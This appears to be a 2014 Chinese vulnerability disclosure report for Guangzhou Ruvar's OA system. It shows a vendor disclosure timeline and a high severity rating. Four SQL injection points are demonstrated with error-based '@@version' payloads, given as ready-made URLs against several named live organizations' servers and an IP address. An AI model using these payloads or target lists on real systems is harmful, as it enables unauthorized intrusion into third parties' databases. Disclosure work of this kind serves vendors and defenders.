2014-06-16: 细节已通知厂商并且等待厂商处理中 2014-06-21: 厂商已经确认,细节仅向厂商公开 2014-06-24: 细节向第三方安全合作伙伴开放 2014-08-15: 细节向核心白帽子及相关领域专家公开 2014-08-25: 细节向普通白帽子公开 2014-09-04: 细节向实习白帽子公开 2014-09-14: 细节向公众公开
用户量很多 求首页
google搜索
广州市璐华计算机有限公司 (C) 版权所有 版本号:6.2.0822
这套系统的官网地址
http://ruvar.com/
企业版OAdemo地址是
http://oa.ruvar.com/
用户很多的
找几个实例进行验证吧第一处
http://oa.mingshiedu.com:801/ContractManage/get_company.aspx
http://www.kinghighway.com:9000/ContractManage/get_company.aspx
http://oa.gdjierong.com:8090/ContractManage/get_company.aspx
http://oa.ruvar.com//ContractManage/get_company.aspx
http://116.204.107.145:9000/ContractManage/get_company.aspx
输入框处存在注入分别输入
%' and (select @@version)>0 --
可以显示报错信息
第二处
http://oa.ruvar.com/bulletin/bulletin_template_show.aspx?id=@@version
http://116.204.107.145:9000/bulletin/bulletin_template_show.aspx?id=@@version
http://www.kinghighway.com:9000/bulletin/bulletin_template_show.aspx?id=@@version
http://oa.gdjierong.com:8090/bulletin/bulletin_template_show.aspx?id=@@version
http://oa.mingshiedu.com:801/bulletin/bulletin_template_show.aspx?id=@@version
第三处
http://oa.gdjierong.com:8090/filemanage/file_memo.aspx?file_id=@@version
http://oa.mingshiedu.com:801/filemanage/file_memo.aspx?file_id=@@version
http://oa.ruvar.com/filemanage/file_memo.aspx?file_id=@@version
http://116.204.107.145:9000/filemanage/file_memo.aspx?file_id=@@version
http://www.kinghighway.com:9000/filemanage/file_memo.aspx?file_id=@@version
第四处
http://oa.gdjierong.com:8090/CorporateCulture/kaizen_download.aspx?file_id=1%27%29%20and%20%28select%20@@version%29%3E0--
http://oa.mingshiedu.com:801/CorporateCulture/kaizen_download.aspx?file_id=1%27%29%20and%20%28select%20@@version%29%3E0--
http://oa.ruvar.com/CorporateCulture/kaizen_download.aspx?file_id=1%27%29%20and%20%28select%20@@version%29%3E0--
http://116.204.107.145:9000/CorporateCulture/kaizen_download.aspx?file_id=1%27%29%20and%20%28select%20@@version%29%3E0--
http://www.kinghighway.com:9000/CorporateCulture/kaizen_download.aspx?file_id=1%27%29%20and%20%28select%20@@version%29%3E0--
漏洞证明如上
对参数进行处理吧
危害等级:高
漏洞Rank:20
确认时间:2014-06-21 12:55
暂无